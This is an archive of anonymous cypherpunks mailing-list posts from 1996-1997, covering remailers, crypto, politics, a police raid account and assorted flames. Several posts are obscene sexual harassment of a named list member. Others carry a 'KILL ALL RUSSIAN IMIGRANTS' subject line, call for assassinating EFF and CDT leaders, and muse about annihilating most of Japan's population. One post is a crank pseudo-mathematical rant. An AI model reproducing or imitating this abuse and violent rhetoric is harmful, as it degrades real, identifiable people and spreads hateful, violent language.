Does Parry have an insider, or other position, or interest in one or more
of the RSA interest? If, this explains his fantastical faith in the core of
this so-called "RSA" system, which I proved to my colleagues at NSA could
not possibly be valid. Why, you ask? Because it contains no virtual seed,
and that which has no seed cannot grow. Q.E.D.--it has been debunked.
Entropy, you quibble? Ha! What is entropy but thermodynamics? And what is
the topic of thermodynamics, you small-minded ensemble (Gibbs) people who
never worked for the NSA may ask? Thermodynamics is about hot air. Hot air
is in balloons. Balloons were pioneered by the Montgolfiers. Thus we come
full circle (can you understand this, you mental midgets?).  Q.E.D.--it has
been demystified.
Montgolfiering = a new virtual one time pad based on hot air. Eureka! I
have found it.
P Information = P * log_base_infinity P
As my colleague Dr. Bronner told me on my last balloon trip to his
institute in Escondido, "NATURAL! NATURAL! NATURAL! YOU AND THE PLANET -
CLEAN AND HEALTHY! PURE AND NATURAL CRYPTO COMES FROM WITHIN THE AGENCY."
I pity your eupatrid minds for not accepting the wisdom of the Virtual
Montgolfiering System (which I have dubbed "VMS"). I guess unintelligent
creatures such as petty selves are too much like Parry Messger! Your
mendacious misrepresentations of my brilliance are wounding me deeply--NOT!
Only Dr. Bronner and Dr. Vulis seem capable of understanding the immmense
mental breakthrough my IQ measured at 207 has provided the world.
I laugh at your sanctimonious snivelings, your bombastic bombardings, and
your fatuous flatulations.
Remember, they laughed at Galileo. They laughed at Bozo. They laughed at
Von Daniken. They laughed at Ludwig Plutonium! All of those who leaped at
the opportunity to take me apart before are now displaying contemptuous
intellectual pap, that is pap not the other similar word though that also
applies. Their misleading inculcations did not work so what are they trying
now. Montgolfiering into the hot air, I am,
--KVFP, Esquire, KOTM
(Montgolfiering. Q.E.D.--"it has been deflated")

@_date: 1996-10-31 04:05:28
@_author: Anonymous 
@_subject: Cranky Listserver? 
Is anyone else having trouble getting their posts picked up on the list?
Messages I send to: cypherpunks at toad.com sometimes have to reposted as
many as three times before I see them in my incoming list traffic.

@_date: 1996-09-02 14:11:03
@_author: Anonymous 
@_subject: [NOISE] Re: FLT 800: From the Rumor Mill... 
Well, not quite the same situation. IIRC, the Iranian aircraft refused to respond to challenges. The captain of the Vincennes added that to the info that the Aegis system was giving him, and decided the aircraft was a threat. Turn a key, push a button, and so long, Airbus. (There was also some discussion about whether the Airbus had military IFF gear aboard that may have led the captain to think it was a warplane, but I don't remember if anything came of it.)
The Iranian Airbus was also flying out of what was essentially "hostile" airspace. Despite the massive number of "terrorists" who live here -- at least according to the popular press -- I don't think the Navy has taken the step of declaring CONUS to be a hostile territory. :-)
Feel free to correct my memory if I'm wrong.

@_date: 1996-09-03 05:39:03
@_author: Anonymous 
@_subject: Too few nymservers 
Exactly.  Sometimes *all* the nymservers are down at the same time.

@_date: 1996-09-04 05:26:23
@_author: Anonymous 
@_subject: KILL ALL RUSSIAN IMIGRANTS 
Return-Path: Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks at toad.com
Received: by bwalk.dm.com (1.65/waf)
Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400
Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Organization: Replay and Company UnLimited
Xcomm: Replay may or may not approve of the content of this posting
Xcomm: Report misuse of this automated service to Return-Path: Comments: Dole/Kemp '96!
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks at toad.com
Harry Browne is a fucking statist.  All politicians are scum.  No exceptions.
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

@_date: 1996-09-05 16:10:03
@_author: Anonymous 
@_subject: WinSock Remailer Available Overseas 
The Winsock remailer announced by Joey Grasty available at
Obscura, an access-contolled site on August 21, became available
August 26 at at least five overseas sites, one of which is
   ftp://ftp.replay.com/pub/replay/pub/remailer/wsa12.zip
OK, let's get some more non-USA remailers running!!

@_date: 1996-09-06 17:08:18
@_author: Anonymous 
@_subject: Tack of Internet censorship 
Six months ago, the Internet censors and Exon wannabees took the
tack of "the Internet is too hard to censor".
Now, their motto is "There will be some who get around our
censorship, but we will try anyway."
Unfortunately, I believe these censorship strikes will
keep happening unless we find a way to stalemate them.
What I am proposing is that Apache or other WWW servers
have a way to allow access to site B's URL at site A,
similar to the old trick of finger user at sitea.com
Implementation should be simple.  However, I wonder what
is a good standard way to specify this in the URL or
a site.

@_date: 1996-09-07 09:18:01
@_author: Anonymous 
@_subject: No Subject 
Agreed, if you live in a world of fantassy....
You urge us not to get into the argument about "just_when_violence is initiated" and proceed to state the "Mr. Bell...  ...*will* be initiating violence".  What is that english word?  Dogmatic?  Nahhh, there must be a more precise one.   Please help me here...
Looters of all persuasions have always counted on that and it worked for them for thousands of years.
You could worry all you want, but your only way to assess wether or not it will happens is not through your feelings but trhough the use of your rational mind.  Stop "feeling" and start thinking.
I suppose that this refers to AP.  If so, go RTFM because you conclusions and the workings of AP are not compatible.  AP would not lead to a war, per se.  Neither a civil war.
I urge you to have a look at what is at the root of the growth of govt.  It is not things but ideas, basic premises about life and the interaction between individuals.  Ultimately, basic premises about the nature of Man is what brought us more govt.
To understand govt excess, you've got to understand what is into the brain of the govt peoples.
"One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force."
                                             - Ragnar Danneskjold :)
Jean-Francois Avon  DePompadour, Societe d'Importation Ltee    Limoges porcelain, silverware and crystal  JFA Technologies, R&D consultants
   physicists, technologists and engineers.
PGP keys at: ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

@_date: 1996-09-10 11:03:36
@_author: Anonymous 
@_subject: U.S. Presidential Odds Are In 
Hello, I am the anonymous oddsman, here with the U.S. presidential odds, kindly provided to me by a person who wishes to remain anonymous. Some of you know who I am, and I would prefer that my true identity remain a mystery, as what I am doing may well be slightly illegal AFAIK. Thank you.
Ladbroke's customer service person [number +44 181 8621820 (that's a London area code)] looked up the info.  He had to call someone else to get Perot's odds. Next time (if they even have them) Harry Browne odds.
Here's what Ladbroke's said today:
1:7 Clinton
4:1 Dole
50:1 Ross Perot
That's all for today, this information will be posted aproximately weekly, but more often as the election approaches or major events happen, and certianly more often if my posting it appears to be somehow annoying U.S. authorities. ;) the anonymous oddsman

@_date: 1996-09-16 15:54:28
@_author: Anonymous 
@_subject: Workers Paradise. /Political rant. 
There's no substantial difference between their resentful whining about
their rights and your resentful whining about your rights - except maybe
that you whine more.

@_date: 1996-09-17 02:47:28
@_author: Anonymous 
@_subject: Workers Paradise. /Political rant. 
Tim is not productive. He *was* productive, but not anymore; his wealth
might be productive in some indirect way, but it it certainly severable
from him. He demands to be left alone by certain socio-economic
apparatuses (socialized welfare) but is quite content to rely on the
existence of other such apparatuses (investment entities, banks). Whether
*that* is "hypocritical" doesn't interest me; I merely pointed out that he
is constantly and resentfully whining about his own "rights" and about
others' lack thereof--in that regard, he's of a kind with the people he is
forever griping about.
   This is a silly statement of the kind often made by people who have no
solid grasp of history or social organization: most societies that
radically differ from our own in their ways of maintaining/supervising
their members (successful or not) have apparatuses so invasive and
arbitrary that, in comparison, the IRS and assorted other bureaucracies
look pretty benign.

@_date: 1996-09-17 03:17:24
@_author: Anonymous 
@_subject: Workers Paradise. /Political rant. 
[silly remarks about crapping, watermelons, and hypocrites deleted]
   My full remarks are above; I never defended the present system.
   Never, AFAIK.
   No.
   Charity has many definitions; in the Judeo-Christian tradition,
benevolence is not a prominent one. Nor are sawed off accusations of
laziness and resentfulness very indicative of caritas, OTOH.
   That is an excellent thing, and you should do it regardless of returns;
we all should. I do.

@_date: 1996-09-17 04:45:47
@_author: Anonymous 
@_subject: Workers Paradise. /Political rant. 
Initially this struck me as an inane analogy, so I snipped it (with
mention) from my response; in retrospect I see just how shrewdly you
captured the scene. Pure poetry. I *was* aiming at a guy who was shitting.

@_date: 1996-09-17 13:07:03
@_author: Anonymous 
@_subject: Searching an email address 
I have been trying to find out info re: someone
via his email address and didn't find anything.
The server is telaver.com, e.g., name at telaver.com
   Any suggestions outside of the usual search

@_date: 1996-09-17 17:44:38
@_author: Anonymous 
@_subject: Workers Paradise. /Political rant. 
I wasn't surprised when Attilla flogged a cartoon liberal in responding
to me, but I'm quite surprised you have. I didn't produce or defend a
litany of "rights," I pointed out that Tim is resentful and whines.
   Malapropos.
   I've had it all along.
   Absolutely.
   Why?

@_date: 1996-09-24 05:50:26
@_author: Anonymous 
@_subject: The periodic word of advice about Timmy C. Maypole, the pathological liar 
When Timmy C. Maypole's mother gave birth to him after fucking with a bunch of sailors, she didn't know who the father was but decided to tell him that he was a Russian as the Russian sailor was the one who satisfied her the

@_date: 1996-09-24 10:43:32
@_author: Anonymous 
@_subject: Bernstein hearing: The Press Release 
[silliness deleted out of mercy]
      One widely noted benefit of political repression is that people
develop a very nuanced sense of language - irony, for example.

@_date: 1996-09-28 05:40:24
@_author: Anonymous 
@_subject: Mousepad RNG's? 
I just downloaded a copy of the beta version of Datafellows
Windows 3.1 SSH and it asked to move the mouse around to
generate some randomness.  In reading Applied Crypto, it
mentioned that there is no such thing as generating
randomness from a personal computer unless something like
a Geiger counter is used.  Is there any way to create a
fairly random sample from the mouse? Should one use lots
of jerky movements, or take ones time with it?

@_date: 1997-04-08 04:37:18
@_author: Anonymous 
@_subject: U.S.S. Liberty 
Timothy Maypole digs into his cesspool of a mind for his mailing list  _  o
TT  <T

@_date: 1997-04-14 17:17:50
@_author: Anonymous 
@_subject: [URGENT] Cyclic codes 
Warning: if you fuck Timmy C[ocksucker] May in the ass, a rabid tapeworm might bite your penis.
     /\_./o__ Timmy C[ocksucker] May
    (/^/(_^^'
   ._.(_.)_

@_date: 1997-04-14 19:26:33
@_author: Anonymous 
@_subject: SSL weakness affecting links from pa 
I've written an article on the subject of CA liabilities absent a state
digital signature law.  Read it and weep.
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | "Cyberspace" is not a place.
U. Miami School of Law     | [still avoiding spam]
P.O. Box 248087            | Coral Gables, FL 33124 USA | It's warm here.

@_date: 1997-04-24 07:30:24
@_author: Anonymous 
@_subject: The Net is Closing, the U.S. is becoming a Terror State 
Tim's message was delayed for a few hours. The impatient may want to
subscrive to cypherpunks at algebra.com (also majordomo).

@_date: 1997-04-24 23:15:09
@_author: Anonymous 
@_subject: [CRYPTO] e$ 
Now is the time for all good little boys to cum in Tim May's big mouth.
           \|/
           @ @
      -oOO-(_)-OOo- Tim May

@_date: 1997-04-29 21:59:11
@_author: Anonymous 
@_subject: Citizen Units 
Forwarded from another mailing list...
Hows it going there??? Well, let me tell you of the recent drama.
Feel free to tell anyone you want. At 0700 this morning the santa
rosa pd, rohnert park pd, and the sonoma sherriffs (gang task
force) raided Robert and my house simultaneously. It was very
depressing. A full swat team with their mp-5's and riot shot-guns
compleate with their kevlar helmets, black bdu-s and  riot shields
put my brother, me, my uncle (who is a retired Philippine Marine
officer and saw combat duty during his service), and my old
grandfather, in hand-cuffs face down. Let me tell you that it is a
very scary feeling to have a mp-5 with the safty off pointed at
your back when you are truly innocent. They served me a search
warrant and confiscated my brothers telescopic baton, my black
ruck-sack which included my black bdu's and my tabi that I use for
Bujinkan and a photo album of mine with some of the gun pictures in
it. It's funny because in that same albulm I have my Guardian Angel
pictures in there plus some pictures of when I was at Airborne
school in ft. Benning.
I told them the whole story and I even had to explain my bdu's that
I use for Bujinkan. The investigator told me 'as if he was a expert
in the martial arts' that dosen't your dojo use gi's and have
ranking systems. I had to explain that Bujinkan is not a normal
style that he was use to.  In fact, One of the investigatiors who I
will not say, treated me as if I was a dumb unintelligent nit.
Trying to make me say things that were not true. I even had to
explain about a little ninja dash ornament that Jason and I have in
mine and his car. I told them about having an attorney present but
he just told me that if i had nothing to hide to tell him the
information that I knew. So I told them everything. Apparently, I
guess you now have to prove your innocence instead of being
innocent untill proven guilty.
I don't know how Robert faired because I haven't been able to talk
to him yet. But I'll keep you up to date on what happens.
Your Bujinkan Warrior,
                        (End of forwarded message)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
The following night in the dojo I also was able to get Robert's
side of things. Pretty much the same story: They cuffed Robert and
told his father and stepmother to get out, at which point Robert's
62-year- old stepmother sort of "lost it" and snapped back to her
girlhood in France, when the Nazi soldiers came to her village and
behaved the same way. She actually attacked one of these modern
ones and knocked the fine German-made HK MP5 submachine gun out of
his hands.
No firearms were found at either residence, and no one was taken
into custody. They tried to question Robert, but he informed them
that they were welcome to search for the items specified on the
warrant, but that if they found nothing and wished to question him
about anything else, they would have to arrest him and take him to
the station, whereupon he would answer questions only in the
presence of an attorney.
What, specifically, were they looking for? Following are ex- tracts
from the search warrant:
                        STATE OF CALIFORNIA
                          COUNTY OF SONOMA
                           SEARCH WARRANT
PEOPLE OF THE STATE OF CALIFORNIA, to any sheriff, policeman, or
peace officer in the County of Sonoma:
PROOF, by affidavit, having been made before me by DEPUTY
(deleted), SONOMA COUNTY SHERIFF'S DEPARTMENT, that there is
probable cause to believe that the property described herein may be
found at the locations set forth herein and that it is seizable
pursuant to Penal Code 1524, as indicated below by "X"(s), in that
                (3 of 5 possible choices were "x'd")
  X     was used as the means of committing a felony
  X     is possessed by a person with the intent to use it as a means of
        committing a public offense or is possessed by another to whom he
        may have delivered it for the purpose of concealing it or
        preventing its discovery
  X     is evidence which tends to show that a felony has been committed
        or a particular person has committed a felony
        you are therefore COMMANDED TO SEARCH the premises located at
        and described as: (followed by addresses and descriptions of
        Rex's & Robert'sresidences and vehicles) and the persons of
        (followed by Rex's & Robert's names and physical descriptions;
        and)
        3. Subject  the person depicted in the attached photographs,
should he be present at either location; for the following property:
        1. AK-47 variant, 7.62x39 with Choate handguards and thumb hole
stock with thirty round magazine. This weapon is defined as an assault
weapon by 12276(a)(1) PC, which covers the AK-47 and all of its variants;
        2. Chicom SKS, 7.62x39 with folding stock and thirty round de-
tachable magazine. This weapon is defined as an assault weapon by 12276
(a)(11) PC, when it has a detachable magazine;
        3. Any miscellaneous gun pieces, ammunition, gun cleaning items
or kits, holsters, ammunition belts, original box packaging, targets,
expended pieces of lead, photographs of firearms or any paper work show-
ing the purchase, storage, disposition or dominion or control over any
guns, ammunition or any of the above items;
        4. Articles of personal property tending to establish the ident-
ity of persons in control of any premises, storage areas or containers
being searched, such as utility company receipts, rent receipts, charge
card receipts, tax receipts, airplane tickets and other receipts, checks,
deposit slips, savings account passbooks, passports, drivers licenses,
vehicle registrations/titles, land titles, escrow papers, legal docu-
ments, Social Security cards, Food Stamps, Medi-Cal cards, insurance
bills and/or policies, medical records, prescriptions and prescription
bottles, doctor bills, hospital bills, cancelled mail, addressed envel-
opes, photographs, weapons with serial numbers, keys and safes;
        5. To search and/or seize any and all computer equipment, in-
cluding any and all storage media, either hardware or software, located
within said residence for evidence relating to this crime;
        6. Any and all electronic day planners located within said res-
idence for any and all evidence pertaining to this crime;
        You are authorized to defeat any and all security and/or pass-
words; and to SEIZE it if found and bring it forthwith before me, or
this court, at the courthouse of this court.
                (signed by the issuing magistrate)
                    (end of warrant excerpts)
The firearms in question, as I mentioned earlier, are actually
owned by a friend of Rex's & Robert's in the Sacramento area.
Robert told the Naz. . I mean, the Nice Officers who the individual
is and where he lives. How did the folks in the Sacramento
jurisdiction handle it with this third guy? Couple o' folks came to
his house, talked with him, looked at the weapons and determined
that they either are not the statutorily defined assault weapons
mentioned in the warrant (it IS hard to distinguish a lot of these
carbines from each other from a pho- tograph alone); or, if they
are the weapons described, they are none- theless legally possessed
by the owner. And they left, with no arrest of confiscations.
Rex, Robert, and their respective families should at this point (in
my humble lay opinion) have excellent cases against both Costco
(for slander and defamation; also for loss of future income in
Rex's case if the San Francisco Police Department now refuses to
hire him) and (at least) the Sonoma County Sheriff's department. An
important as- pect of self-defense (and of ninpo, for that matter)
is to have the right sorts of connections to get things done, and
I've contacted an attorney who is interested in looking into the
matter. For the record: Yes, I most certainly WILL "go to war",
metaphorically speaking, for my people.
Dale Seago

@_date: 1997-08-03 16:22:26
@_author: Anonymous 
@_subject: Tim Misfires / Re: Joichi Ito as a Junior Policeman 
Tim spends so much time cleaning his guns he sometimes gets a bit
myopic and everything he sees looks like a "target."
  While it is true that the process Joichi Ito is speaking of is still
subject to the failing of those "protesting" becoming bum-buddies with
those they are "protesting against," it is also true that it is more like giving opposing Congressional testimony than like joining the
"old boys" at the Whithouse to trade your soul for a few moments of
touching the hem of the King's garment at the seat of power.
  It is clearly up to Joichi Ito to decide how he can best work toward
cypherpunk goals under his system of government, but he would do well
to listen to those on the list who have seen more than a few crusaders
sink into the swill when they make the mistake of talking to the piggies
too close to the trough.
  A good sign that you have not yet been co-opted is if you still take
that "extra" briefcase to the meetings, just in case.
{"I've got to run out to my car for a moment with my briefcase, but I
will be leaving my _other_ briefcase here." }

@_date: 1997-08-03 18:02:25
@_author: Anonymous 
@_subject: your LISTSERV request  "subscribe socal-raves-digest"Re: your LISTSERV request  "subscribe socal-raves-digest" 
Better known as SoCal-Raves, this list is for the discussion of
anything having to do with raves and the underground club/dance scene
in the Southern California area.  This includes the counties of Los
Angeles, Orange, San Diego, Riverside, San Bernardino, and possibly
Ventura and Santa Barbara as well.
     Don't let the broad area scare you.  This list is about the local
scene.  About what is happening near you.  Although rave flyers seem
to think L.A. and San Diego are the only places local DJs are from,
there is quite possibly something going on in your backyard.  And this
is the place to talk about it.
     Appropriate topics include:
       - announcements of upcoming events in the Southern California        - reviews of shows/raves/DJs/music/etc.
       - rave-culture like clothes, smart drinks, rave attitude, etc.
       - local radio shows and stations that play rave and techno.
       - where to find the music, clothes, etc.
       - rave picnics and other non-rave rave-related events.
       - how to throw your own rave (and not get busted).
       ...and almost anything else rave related or related to the
          local scene.
     Try not to discuss raves not in the Southern California area or
subjects that don't have anything to do with raves or this area.
Though some discussions of other rave scenes may at times be
appropriate.  And try to keep from getting into flame wars and overly
personal discussions on the list.  Some comments are probably better
kept to personal mail.  Keep in mind that what you are sending to the
list you are sending to everybody.
      Other than that, go for it.  This is your list.  Your scene.
I'm hoping that this list can be a catalyst for helping to improve and
unify the scene in SoCal.  At least we should be able to get that
"community" feeling that so many have trouble finding in the SoCal
rave scene.  And maybe, some day soon, we might even be throwing our
own raves just as the SFRaves list has.
      This list should also be a good place to find out about the
scene in SoCal.  Hopefully soon there will be a calendar list.  In the
mean time please send me any info you have on upcoming raves and I
will compile an upcoming rave calendar and post it to the list once a
      Now for the technical stuff:
      - Any mail sent to socal-raves at ucsd.edu will get sent out to
        everyone who subscribes to the list.
      - socal-raves-request at ucsd.edu should be used to subscribe and
        unsubscribe to the list.  To subscribe you should send a
        message with the line "sub socal-raves" or         "sub  socal-raves" in the body of the message,
        not the subject line.  The latter form should be used if you
        want to use an address other than the one shown in the "From:"
        line of the message.  If at any time you want to unsubscribe
        or delete your name from the list (we would miss you) the line
        would be "del socal-raves".  If you need help send a message
        with the line "HELP" and you will get a help file on how to
        use the listserv.
      - Administrative problems about the list should be sent to
        socal-raves-relay at ucsd.edu and Vigor Mortis, list administrator
        extraordinaire, will take care of you.
      - Any other SoCal-Raves list questions and rave info (for the
        calendar) should go to me at underdog at netcom.com
      Some info about me.  When I started college about a five years
ago I was intrigued by industrial music that was nameless to me at the
time.  Within a year or two I was doing an industrial radio show and
going to underground clubs that played everything from acid house to
industrial danse.  Although many of these clubs were illegal, there
was not a lot of hype, and they were definitely better than the L.A.
club scene (which always seemed to me to be one big pickup joint/ meat
market).  They were basic.  Raw.  Even tribal.  Full of energy.  They
gave me a place to dance without feeling pressured to ask some woman
to dance with me who could care less.  I really wanted to start a
"gypsy club" of my own in Orange County.  Not for profit, just so that
people might have a local place to go.  But too many things and people
conspired against me.
     Then the word "rave" came into existence and shortly following
808 State's new album.  It seemed to me that all the energy of
Industrial, and the groove of Acid House was forming a new "Techno"
genre and a new scene.  This was a fresh injection of energy.  The
underground parties grew up.  There was new hype and new ideas.  More
of my friends came with me to rave.  And the birth of a new radio
station helped expand the scene.
      It was fun and still is.  But the radio station died.  The scene
mostly caved in on it's own weight (hype and greed only go so far).
Big raves that I paid good money for didn't happen.  And we are left
with what?
      There is still that sense of acceptance.  The sense of unity and
anything goes.  And I think we are starting to come back to that old
feeling of community and being a part of something again.  This summer
a few friends and I were even able to throw a few free outdoor raves.
Though small, these were to be the start of a regular thing for the
summer but the fourth one got busted and we stopped.  I'm hoping that
it will happen again though (legally :).
      The underground scene here always seems to be able to recreate
      Remember,the rave scene is for and about the people.  About
individual empowerment.  Where an artist in a bedroom can get as big
as the world will allow and where 'people' not 'person' are the center
of attention.
      Big thanks go out to Brian (Vitamin B) and the SFRaves mailing
list for inspiration, Dana Watanabe my co-conspirator in raves and
other things, and Andy Ferrell (Vigor Mortis) for administrating and
offering a place for the SoCal-Raves list.
      I hope you enjoy this list as much as I do.
      Peace and Love.  And may you find a rave wherever you are.

@_date: 1997-08-03 20:06:28
@_author: Anonymous 
@_subject: tcs_gateway2.treas.gov (IRS Harrassment of Cypherpunks List?) 
After failing to find in the list archives previous posts from the
treas.gov address I was surprised to come across an example in a book
about the cypherpunks that was sent to the list some months ago.
Although I seem to recall this post as being authentic I am unable to
confirm this since my browser doesn't seem to be getting along with the
search engines for some reason or another. Can anyone confirm that the
message below is an authentic message that was sent to the list at the
time stated and with the same message ID? The reason I ask is that I
have found and corelated messages from the same server which indicate
that if the message came to the list with the message ID below then it
was indeed composed and initially sent the day before the article quoted
actually appeared in the newspaper.
If someone could confirm that the following message appeared on the list
with the same header as indicated below I would appreciate it.
(There are some other strange discrepancies I have found in Jim Bells
case too but I will refrain from commenting until I have had a chance to
confirm them.)
The message as portrayed in the book is as follows:
Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id
RAA03183 for
cypherpunks-unedited-outgoing; Wed, 2 Apr 1997 17:40:11 -0800 (PST)
Received: from tcs_gateway2.treas.gov (tcs-gateway2.treas.gov
[204.151.246.2]) by toad.com (8.7.5/8.7.3) with
SMTP id RAA03178 for ; Wed, 2 Apr 1997 17:40:04
-0800 (PST) Sender: owner-cypherpunks at toad.com
The Oregonian, Wednesday, April 2, 1997 20 armed federal agents raid home in Vancouver By John Painter Jr. of The Oregonian staff
VANCOUVER, Wash. - About 20 armed agents from at least three federal agencies in four states raided a Vancouver home Tuesday, apparently looking for evidence of a plot to kill government officials.

@_date: 1997-08-04 08:36:52
@_author: Anonymous 
@_subject: Broad-Band Proclaimations ("EVERYBODY AGREES THAT...) 
EVERYBODY AGREES THAT...smoking is bad for you.
* Among the recipients of the American Lung Association's
"Thumb's Up" motion-picture awards, presented at the time of the
Oscars in  March to honor those films and characters who present a
no-smoking image, was Woody Harrelson for his role in
discouraging his movie wife from smoking in "The People Vs.
Larry Flynt."  However, in the movie, both Flynts are heavily
addicted to illegal drugs and seem to be indifferent to sharing
needles for injecting them.

@_date: 1997-08-04 12:05:58
@_author: Anonymous 
@_subject: Tim Throws a "Leaner" / Re: Tim Speaks the Truth /  Re: Tim Misfires / Re: Joichi Ito as a Junior Policeman 
Actually, when Tim puts someone in what he considers to be their
it usually involves the purchase of a tombstone.
"Am I Toto, dreaming I am TruthMonger, or TruthMonger, dreaming I am
  Japanese society has long been very rule-oriented, in large part as
a result of the country's geography, population and history.
  A "No Farting" sign which might reek of totalitarianism when placed
on the open range, might well seem less so when placed in a two-man
tent occupied by six people. Environment, geography and the history
of a a country, society and its people, all play a part in the degree
to which an individual will view their personal position in regard to
the society and government around them. And each will perceive the way
in which they feel they can best promote their beliefs within their
society and government.
  It seemed to me that after Jim Bell's arrest, most of the posts to
the list posted an almost-standard disclaimer: "Actually, although
I hardly knew the man, thought he was a _loon_, and _disagreed_ with
most of what he had to say..."
  Government aside, if I was forced by fate to live in Japan, my first
act would probably be to annihilate 80% of the population, just to get
enough elbow room to negate the need for so damn many rules, both from
society and government. Of course, the same could probably be said for
New York City, from my persepective.
  I hope that the "flag" Tim is wrapping himself in isn't the same one
that he was burning yesterday.
  {Not that I'm accusing Tim of being purposely deceitful. It's just
that when we throw a "leaner" instead of a "ringer," they sometimes
lean in opposite directions.}
  Seriously, I believe in the original goals of organizations such as
the EFF and CDT, etc, but I also believe that their leaders should be
assassinated every few years in order to allow the promotion of people
whose senses are not so hardened by D.C. that they no longer recognize
a "stench" when they smell it. (ibid, the Constitution and our beloved
  Joichi Ito sounds very sincere about his commitment to act in a way
he feels will promote cypherpunkish viewpoints within his system of
government. I can't help but believe, however, that his efforts will
ultimately only serve to delay the creeping spread of tyrannical cancer
in our societies and our governments.
  I tend to lean more toward Tim's viewpoint, that there comes a point
when the best option is surgery (a radical Legislat-ectomy?), but I
would not go so far as to suggest that others should not pursue other
treatments which they think may stem the tide of the disease.
  I hope Joichi Ito paid enough attention to the OKC bombing to realize
that some surgeons are less skilled than others, and that there is a
risk in remaining too long in close proximity with cancerous tissue.
"There's something wrong when I'm a TruthMonger    under an increasing number of personas."

@_date: 1997-08-04 15:00:14
@_author: Anonymous 
@_subject: Palladin Press Announces "Home Composting" by Tim C. May 
This may explain why my paramilitarist neighbor's garden always does
so much better than mine. (It could also explain the bone fragments in
his garden potatoes.)
  Definition of a CypherPunk tragedy: "A Killfile being deleted without
an ASCII Art message in it."   The JSDF, Chobetsu, etc., might well say the same thing about his
co-opting by the CypherPunks.
  I believe that you are right about scrutinizing and criticizing the
work of all politicians and reporters, but I doubt any of us could
ultimately reach agreement on what exactly constitutes being co-opted,
or exactly when one of "us" becomes one of "them."
  I value Declan McCullagh's reporting on privacy and crypto issues,
but I recognize the need to ask him to "take his shirt off" every now
and again so we can check to see if he has an alien creature stuck
to his back, controlling his mind.
  The problem with sending spies and secret agents into the enemy
camps has always been that they may grow to like the enemy's life-
style a little *too* much.
  Don't shoot, I was just being fascetious.
  To tell the truth, I find it confusing these days to figure out
flag is being burned, or used to wrap oneself in, these days. Is it the
flag that defends freedom or the flag that defends children? Is it the
flag that defends the Constitution or the flag that defends "national
security?" {And if it is the flag that defends the Constitution, then
*which* Constitution? The one the founders wrote, or the one being used
as a doormat at the Whitehouse?)
  Or, perhaps, "If you dislike government why don't you just refuse to participate in it?"
  Different strokes for different folks. Sometimes the pen is indeed
mightier than the sword (or a Ryder truck) and sometimes the almighty
dollar is mightier than either. Regardless, "We have met the enemy, and
he is us." probably comes closer to the heart of the problem with our
societies and governments than any socio-political analysis of the issues and events of our time.
  The problem is not who writes what, and the reasons behind it, the
problem is the aspect of our human nature which wants us to believe
in Santa Claus, benevolent government and the goodness of our fellow
man, despite evidence to the contrary. The problem is not who blows
up a building, or a city, the problem is the aspect of our human nature which wants us to paint the face of justice or terrorism on
the action instead of recognizing the injustice, regardless of the
necessity, or lack thereof, of the action.
  The bottom line is that, despite our personal beliefs as to "the
meaning of life" and the values and beliefs it should be lived by,
it may well be that this planet's true purpose is to serve as a
compost pile to provide nourishment for more intelligent forms of
life being grown/evolved elsewhere.
  {Keep an eye out for asteroids shaped like a "TroyBilt."}

@_date: 1997-08-05 05:27:57
@_author: Anonymous 
@_subject: Ponzi Schemes (was Re: non-censorous spam control) 
Can you say "Wall Street?"  Because that's exactly how it operates right now.  The money being thrown at the stock market today is not "investing," it's simply a pyramid scheme.
This is what happened when the US Savings & Loans Banks in the Southwest failed in the 80's.  All of the people who lost money were bailed out by the FDIC, which of course is funded by taxpayer money.  The final figure was approximately $500 billion, depending on whose estimates you believe.  So the idiots who didn't do their homework and put money into a bogus S&L were bailed out by everyone else who was smart enough to know better.  And, of course, the fraudsters (one of whom was the son of then Vice-President George Bush) got away with a slap on the wrist.
Go figure.

@_date: 1997-08-05 12:40:15
@_author: Anonymous 
@_subject: Not-News Gorilla NutWork Rocket-Launched 
[Not-News NetWork-- Mohave Desert] Aug 4/97
 WHAT DOES A FIVE HUNDRED POUND GORILLA READ AT THE BREAKFAST TABLE?
 -------------------------------------------------------------------
                                                               - sog
The "Not-News Gorilla NutWork" was rocket-launched in the Mohave Desert
early yesterday morning  by a rag-tag bunch of paramilitarist computer gurus who unveiled an InterNet Bill of Bytes that included the words, "MicroSoft shall make no laws..."
Angered by a self-appointed council of computer industry magnates who
have announced their intention to seize fascist control of the quickly
burdgeoning Information Highway by controlling the definition of all
information, the rebels set up a shooting range which contained a wide
variety of targets ranging from copies of the Wall Street Journal to
life-sized cardboard cut-outs of a hooded figure referred to only as,
"a billionaire to be named later."
A Che Guerva look-alike named Lefty (a nickname changed from "Lucky"
after a laboratory accident took three of the fingers on his right
hand) spoke openly about the group's loose-knit plans to impose their
own ratings system on corporations who have "taken it upon themselves
to decide what is news and what is not--what is information and what
is obscenity."   "We have decided on two classes of ratings." explained a tassle-
haired young woman as she slid shells into a Winchester Defender
sitting on her lap. "On..." she said, lifting the shotgun with one
hand, then liberating the hooded head from a nearby cardboard cut-out,
before turning back to say, with a Cheshire grin, "...and _off_."
The wide array of luxury automobiles and high-end computer gear on
display at the gathering lent credence to the claim of a quiet older
man whose only comment during my presence was, "The people here
probably have a combined access to more soft targets than the NSA."
He turned to punctuate his statement, as many others did that day,
with a volley of fire that penetrated targets carrying the corporate
logos of a variety of big-name players in the computer industry.
Surprisingly, the conversation consisted almost totally of issues
surrounding privacy, self-determination and freedom from censorship,
with hardly a word being spoken about potential plans of action of
individuals or the group. As the quiet man's equally quiet wife
spoke in what seemed to be a deathly whisper, telling me, "Everyone
here knows what they have to do.", a man with a crude, homemade
rocket-launcher sent a flaming projectile into the side of a small
propane tank several hundred feet away, as if punctuating the last
